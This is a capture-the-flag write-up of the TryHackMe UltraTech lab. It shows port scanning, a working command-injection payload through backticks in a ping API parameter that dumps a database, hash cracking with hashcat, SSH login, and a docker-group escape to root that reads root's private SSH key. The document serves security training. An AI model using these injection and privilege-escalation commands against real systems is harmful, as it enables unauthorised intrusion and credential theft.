This is a write-up of the room UltraTech from TryHackMe.

Task 1: Deploy the machine

Deploy the machine by clicking deploy.

Task 2: Enumeration

Let’s scan the box by running

┌─[root@parrot]─[~/thm/ultratech]
└──╼ #nmap -sC -sV -p- $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 20:05 BST
PORT      STATE SERVICE VERSION
8081/tcp  open  http    Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 15C1B7515662078EF4B5C724E2927A96
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
...

As you can see from the output, a Node.js Express application is listening on port 8081, and an Apache 2.4.29 server on port 31331 serves the UltraTech site. Proxying the site through Burp Suite shows that the /partners.html page on port 31331 calls two routes on the Node.js API: http://10.10.27.184:8081/ping?ip=10.10.27.184 and http://10.10.27.184:8081/auth?login=user&password=password.

Task 3: Let the fun begin!

Let’s investigate the ping route. Requesting http://10.10.27.184:8081/ping?ip=ls returns ping: ls: Temporary failure in name resolution, so whatever we put in ip is handed straight to the ping command as its target. Requesting http://10.10.27.184:8081/ping?ip=`ls` instead returns ping: utech.db.sqlite: Name or service not known. The backticks were evaluated by a shell before ping ran, and the output of ls (a file called utech.db.sqlite in the application's working directory) became the ping target. In other words, the ip parameter is injected unsanitised into a shell command, and anything wrapped in backticks runs on the server.

To read the database, visit http://10.10.27.184:8081/ping?ip=`cat utech.db.sqlite`.
Among the output is the hash f357a0*******************

Running hashcat against the hash with the rockyou wordlist recovers the password:

┌─[root@parrot]─[~/thm/ultratech]
└──╼ #hashcat hash /usr/share/wordlists/rockyou.txt
...
f357a0***************:n*******

We can now SSH into the box as r00t with the recovered password.

Task 4: The Root of All Evil

Once on the box, we can run LinEnum.sh to look for ways of becoming root.

The output shows that r00t is a member of the docker group. That group grants access to the Docker daemon's socket, and the daemon itself runs as root, so any member can start a container with the host's filesystem mounted and act as root on the host. We can use that to escalate.

Running docker run -v /:/mnt --rm -it bash chroot /mnt sh starts a container from the bash image (which must already be present locally or be pullable) with the host's / bind-mounted at /mnt, then chroots into that mount, which gives us a root shell on the host filesystem. From there, cat /root/.ssh/id_rsa prints the root user's private key; its first 9 characters, the usual opening of a base64-encoded RSA private key, are MIIEogIBA

That’s the room complete!